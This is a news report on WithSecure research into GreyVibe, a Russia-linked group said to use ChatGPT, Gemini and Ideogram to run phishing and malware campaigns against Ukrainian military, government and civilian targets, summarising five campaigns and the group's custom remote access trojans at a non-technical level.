Russia-linked hackers used ChatGPT, Gemini to attack Ukrainian targets

WithSecure published research documenting GreyVibe, a Russia-linked group using ChatGPT, Gemini, and Ideogram AI to build phishing lures and custom malware targeting Ukraine.bleepingcomputer
The group ran five campaigns including honeytrap dating sites, fake CAPTCHAs leading to real Zoom calls, and spoofed military portals to compromise soldiers and officials.bleepingcomputer
Researchers said GreyVibe appears hired by Russia’s government rather than part of it, showing how AI lets lower-skill actors scale sophisticated operations.bleepingcomputer

Russia-Linked GreyVibe Uses ChatGPT and Gemini to Scale Cyberattacks on Ukraine

A previously unknown threat group with ties to Russia has been leveraging generative AI tools across every phase of its cyberattack operations against Ukrainian targets, according to new research published this week by cybersecurity firm WithSecure.

AI-Powered Espionage

The group, tracked as GreyVibe, has been active since at least August 2025 and targets Ukrainian military, government, civilian, and business organizations, WithSecure said in a report published on May 27. Researchers discovered the activity in January 2026 and found that the group uses OpenAI’s ChatGPT, Google Gemini, and Ideogram AI to generate phishing lures, build fake websites, develop custom malware, and create post-compromise tooling.bleepingcomputer

The link to Russia is supported by malware panels written in Russian, comments in code artifacts, and command-and-control servers configured to Moscow time (UTC+3), though WithSecure stopped short of classifying it as a formal nation-state operation.bleepingcomputer

Five Campaign Chains

WithSecure documented five distinct attack campaigns. PhantomMail uses spear-phishing emails with malicious archives disguised as Ukrainian government and energy documents. PhantomClick deploys fake CAPTCHA pages that trick victims into running self-infecting commands, then redirects them to legitimate Zoom meetings so they never suspect compromise. PrincessClub — perhaps the most elaborate — uses fake adult dating websites and Telegram personas to lure Ukrainian military personnel into installing spyware, including live video calls with real people to build trust.itmedia

Two additional campaigns, DroneLink and Nebo, use fake Ukrainian military charity sites and spoofed Russian military login portals, respectively.bleepingcomputer

The group deploys custom malware including LegionRelay and PhantomRelay, both PowerShell-based remote access trojans likely developed with AI assistance. LegionRelay can steal files, capture screenshots, exfiltrate browser credentials and messaging data from Telegram and WhatsApp, and set up remote desktop access. On Android devices, the group uses FallSpy spyware to harvest contacts, call logs, location data, and media files.bleepingcomputer

Cybercriminal Roots, State-Aligned Mission

Despite operating in line with Russian state interests, GreyVibe “lacked the level of sophistication and operational discipline typically associated with mature nation-state actors,” WithSecure noted. Some evidence ties the group to former TrickBot cybercriminals who targeted Ukraine at the start of Russia’s invasion, and the operators deployed cryptocurrency miners on some victim machines — unusual for state-backed groups.bleepingcomputer

WithSecure’s Christine Beherasko said the firm believes GreyVibe is “hired by” the Russian government rather than being part of it directly. The group remains active, with campaigns observed as recently as April 2026, and its members are still unidentified. Researchers said GreyVibe represents a clear example of how generative AI allows lower-skill actors to “punch above their weight” — accelerating operations and complicating attribution across multiple stages of the attack lifecycle.linkedin